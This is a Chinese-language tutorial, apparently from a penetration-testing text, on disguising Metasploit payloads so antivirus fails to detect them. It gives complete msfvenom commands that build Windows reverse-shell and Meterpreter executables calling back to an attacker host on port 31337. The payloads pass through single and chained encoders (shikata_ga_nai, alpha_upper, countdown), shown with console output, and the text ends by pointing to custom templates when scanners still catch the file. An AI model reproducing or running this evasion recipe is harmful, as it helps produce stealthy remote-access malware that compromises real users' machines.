对msf生成的攻击载荷进行免杀处理

使用MSF编码器

避免被查杀的最佳方法之一就是使用MSF编码器（集成入msfvenom功能程序）对我们要生成的攻击载荷文件进行重新编码。MSF编码器是一个非常实用的工具，它能够改变可执行文件中的代码形状，让杀毒软件认不出它原来的样子，而程序功能不会受到任何影响。和电子邮件附件使用Base64重新编码类似，MSF编码器将原始的可执行程序进行编码，并生成一个新的二进制文件。当这个文件运行后，MSF编码器会将原始程序解码到内存中并执行。

我们可以使用msfvenom -h命令查看MSF编码器的各种参数，它们当中最为重要的是与编码格式有关的参数。在下面的学习中，我们可以使用msvenom -l encoders列出所有可用的编码格式。但是需要注意的是不同的编码格式适用于不同的操作系统平台。由于架构不同，一个Power PC（PPC）编码器生成的文件在x86平台上将无法正常工作。

root@bogon:~# msfvenom -l encoders

Framework Encoders

==================

    Name                          Rank       Description

    ----                          ----       -----------

    cmd/echo                      good       Echo Command Encoder

    cmd/generic_sh              manual     Generic Shell Variable Substitution Command Encoder

    cmd/ifs                       low        Generic ${IFS} Substitution Command Encoder

    cmd/perl                      normal     Perl Command Encoder

    cmd/powershell_base64         excellent  Powershell Base64 Command Encoder

    cmd/printf_php_mq             manual     printf(1) via PHP magic_quotes Utility Command Encoder

    generic/eicar                 manual     The EICAR Encoder

    generic/none                  normal     The "none" Encoder

    mipsbe/byte_xori              normal     Byte XORi Encoder

    mipsbe/longxor                normal     XOR Encoder

    mipsle/byte_xori              normal     Byte XORi Encoder

    mipsle/longxor                normal     XOR Encoder

    php/base64                    great      PHP Base64 Encoder

    ppc/longxor                   normal     PPC LongXOR Encoder

    ppc/longxor_tag               normal     PPC LongXOR Encoder

    sparc/longxor_tag             normal     SPARC DWORD XOR Encoder

    x64/xor                       normal     XOR Encoder

    x64/zutto_dekiru              manual     Zutto Dekiru

    x86/add_sub                   manual     Add/Sub Encoder

      ………

    x86/shikata_ga_nai            excellent  Polymorphic XOR Additive Feedback Encoder

    x86/single_static_bit         manual     Single Static Bit

    x86/unicode_mixed             manual     Alpha2 Alphanumeric Unicode Mixedcase Encoder

x86/unicode_upper             manual     Alpha2 Alphanumeric Unicode Uppercase Encoder

现在我们对MSF攻击载荷进行编码，将MSF攻击载荷生成器生成的原始数据输入MSF编码器中，并查看生成的可执行文件还会不会被杀毒软件检测到。相关代码如代码清如下所示。

root@bogon:~# msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.128 LPORT=31337 -e x86/shikata_ga_nai -f exe -o /root/payload2.exe             ①

No platform was selected, choosing Msf::Module::Platform::Windows from the payload

No Arch selected, selecting Arch: x86 from the payload

Found 1 compatible encoders

Attempting to encode payload with 1 iterations of x86/shikata_ga_nai

x86/shikata_ga_nai succeeded with size 351 (iteration=0)

x86/shikata_ga_nai chosen with final size 351

Payload size: 351 bytes

Final size of exe file: 73802 bytes

Saved as: /root/payload2.exe

root@bogon:~#file payload2.exe                                    ②

payload2.exe: PE32 executable (GUI) Intel 80386, for MS Windows

我们在msfvenom命令选项中①使用-p指定使用的攻击载荷模块，使用-e指定使用x86/shikata_ga_nai编码器，使用-f选项告诉MSF编码器输出格式为exe，-o选项指定输出的文件名为payload2.exe，保存在根目录下。

最后，我们对生成的文件进行快速类型检查②，确保生成文件是Windows可执行文件格式，检查结果告诉我们文件没有问题。然而不幸的是，当我们将payload2.exe拷贝到我们的Windows主机上后，还是没能逃过杀毒软件的检测。

这时我们可以使用多重编码

root@bogon:~# msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.10.128 lport=31337 -e x86/shikata_ga_nai -i 10 -f raw | msfvenom -e x86/alpha_upper -a x86 --platform windows -i 5 -f raw | msfvenom -e x86/shikata_ga_nai -a x86 --platform windows -i 10 -f raw | msfvenom -e x86/countdown -a x86 --platform windows -i 10 -f exe -o /root/payload3.exe ①
Attempting to read payload from STDIN...
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 10 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 360 (iteration=0)
x86/shikata_ga_nai succeeded with size 387 (iteration=1)
……
x86/shikata_ga_nai succeeded with size 576 (iteration=8)
x86/shikata_ga_nai succeeded with size 603 (iteration=9)
x86/shikata_ga_nai chosen with final size 603
Payload size: 603 bytes
/usr/share/metasploit-framework/lib/msf/core/payload/dalvik.rb:72:in `not_after=': bignum too big to convert into `long' (RangeError)
	from /usr/share/metasploit-framework/lib/msf/core/payload/dalvik.rb:72:in `generate_cert'
	from /usr/share/metasploit-framework/modules/payloads/stagers/android/reverse_http.rb:56:in `generate_jar'
	from /usr/share/metasploit-framework/lib/msf/core/payload/dalvik.rb:27:in `generate'
	from /usr/share/metasploit-framework/lib/msf/core/payload.rb:200:in `size'
	from /usr/share/metasploit-framework/lib/msf/core/payload_set.rb:158:in `block (2 levels) 
……

	from /usr/share/metasploit-framework/lib/msf/core/module_manager/loading.rb:115:in `each'
	from /usr/share/metasploit-framework/lib/msf/core/module_manager/loading.rb:115:in `load_modules'
	from /usr/share/metasploit-framework/lib/msf/core/module_manager/module_paths.rb:41:in `block in add_module_path'
	/usr/share/metasploit-framework/lib/msf/base/simple/framework/module_paths.rb:49:in `init_module_paths'
	from /usr/share/metasploit-framework/lib/msf/base/simple/framework.rb:121:in `simplify'
	from /usr/share/metasploit-framework/lib/msf/base/simple/framework.rb:73:in `create'
	from /usr/bin/msfvenom:39:in `init_framework'
	from /usr/bin/msfvenom:48:in `framework'
	from /usr/bin/msfvenom:334:in `
'
/usr/share/metasploit-framework/lib/msf/core/payload/dalvik.rb:72:in `not_after=': bignum too big to convert into `long' (RangeError)
	from /usr/share/metasploit-framework/lib/msf/core/payload/dalvik.rb:72:in `generate_cert'
	from /usr/share/metasploit-framework/modules/payloads/stagers/android/reverse_tcp.rb:55:in `generate_jar'
	from /usr/share/metasploit-framework/lib/msf/core/payload/dalvik.rb:27:in `generate'
	from /usr/share/metasploit-framework/lib/msf/core/payload.rb:200:in `size'
	from /usr/share/metasploit-framework/lib/msf/core/payload_set.rb:158:in `block (2 levels) in recalculate'
	……
	from /usr/share/metasploit-framework/lib/msf/base/simple/framework/module_paths.rb:49:in `each'
	from /usr/share/metasploit-framework/lib/msf/base/simple/framework/module_paths.rb:49:in `init_module_paths'
	from /usr/share/metasploit-framework/lib/msf/base/simple/framework.rb:121:in `simplify'
	from /usr/share/metasploit-framework/lib/msf/base/simple/framework.rb:73:in `create'
	from /usr/bin/msfvenom:39:in `init_framework'
	from /usr/bin/msfvenom:48:in `framework'
	from /usr/bin/msfvenom:334:in `
'
Found 1 compatible encoders
Attempting to encode payload with 10 iterations of x86/countdown
x86/countdown succeeded with size 16 (iteration=0)
x86/countdown succeeded with size 32 (iteration=1)
……
x86/countdown succeeded with size 161 (iteration=9)
x86/countdown chosen with final size 161
Payload size: 161 bytes
Final size of exe file: 73802 bytes
Saved as: /root/payload3.exe 

如果此时还未能逃过杀毒软件的扫描，则我们可以自定义可执行文件模板。